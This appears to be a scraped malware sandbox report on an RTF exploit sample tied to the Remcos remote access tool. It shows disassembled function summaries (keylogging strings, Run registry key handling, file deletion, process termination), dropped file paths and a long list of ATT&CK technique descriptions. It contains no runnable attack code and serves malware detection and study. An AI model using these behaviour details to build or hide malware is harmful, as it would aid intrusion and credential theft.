GetKeyState.USER32(00000012), ref: 0040B5F3

Strings

[CtrlL], xrefs: 0040B621
[CtrlR], xrefs: 0040B610

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
Instruction ID: 0a29407495d8d2227e56f06805126889c23c54001464371f268d9f95623807a6
Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
Instruction Fuzzy Hash: 86E0863174431057C514363D5A2B6792911D752B54F42097FE882676CADAFF8D1603CF

Uniqueness

Uniqueness Score: -1.00%

Function 00413971 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 0041397F
RegDeleteValueW.ADVAPI32 ref: 00413993

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041397D

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction ID: 598427e10cd0738da965e261ca374841197e4f19c32ff2ed64c8c0b72025bf2e
Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction Fuzzy Hash: C0E08C71254208FBDF104F71DC06FEA772CDB01B02F1046A9BA0692091C6668E159664

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B7C4
RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B7EF

Strings

pth_unenc, xrefs: 0040B7B7

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteDirectoryFileRemove
String ID: pth_unenc
API String ID: 3325800564-4028850238
Opcode ID: 88e96a8173b682c54d564dd3c6d6f117ced71a209c30aa3c6350f34697caf810
Instruction ID: 8946e93c50c242ae22eab23d4fc85e5ed07eddfaa886144743a5101fb039176e
Opcode Fuzzy Hash: 88e96a8173b682c54d564dd3c6d6f117ced71a209c30aa3c6350f34697caf810
Instruction Fuzzy Hash: 17E046311006129BCB14AB258848AD63398AB5031AF00086BA492A32A1EF38A809CAAC

Uniqueness

Uniqueness Score: -1.00%

Function 0041279E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(00000000,pth_unenc,0040F816), ref: 004127AE
WaitForSingleObject.KERNEL32(000000FF), ref: 004127C1

Strings

pth_unenc, xrefs: 0041279E

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ObjectProcessSingleTerminateWait
String ID: pth_unenc
API String ID: 1872346434-4028850238
Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59

Uniqueness

Uniqueness Score: -1.00%

Function 00440BD1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440C67
GetLastError.KERNEL32 ref: 00440C75
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440CD0

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 77b723f1483c6ef79eaf4aa6ca227525f645002ebe34907890468f50899a5783
Instruction ID: e49dfba6500d6e6d0807855c13dbf11e238b692b51ebe0c496a3b0b53f15648d
Opcode Fuzzy Hash: 77b723f1483c6ef79eaf4aa6ca227525f645002ebe34907890468f50899a5783
Instruction Fuzzy Hash: 04413B74900206EFEF258FA5C88477F7BA4EF45310F10416AFA555B3A1DB389D21CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00411AAD Relevance: 5.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411E3E), ref: 00411ADA
IsBadReadPtr.KERNEL32(?,00000014,00411E3E), ref: 00411BA6
SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BC8
SetLastError.KERNEL32(0000007E,00411E3E), ref: 00411BDF

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: d73a6a570accd9d678158fa0247393ac9b593d34a1829b4547152882449a6a98
Instruction ID: c8bc6cb37384f26264b50b04770b4c06cdfb05c419d180bf3ed7721445b965b7
Opcode Fuzzy Hash: d73a6a570accd9d678158fa0247393ac9b593d34a1829b4547152882449a6a98
Instruction Fuzzy Hash: FA419D716083059FDB248F59DC84BA7B7E8FF44715F00482EEA86876A1E738F945CB19

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

Spreading

System Summary

Data Obfuscation

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\WQQ.vbs

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Windows Analysis Report
SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre